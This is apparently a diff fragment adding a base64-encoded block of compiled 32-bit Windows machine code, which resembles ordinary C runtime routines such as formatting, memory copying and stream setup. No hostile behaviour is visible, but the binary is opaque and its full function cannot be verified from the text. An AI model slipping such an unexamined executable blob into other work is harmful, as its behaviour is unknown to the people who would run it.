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
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
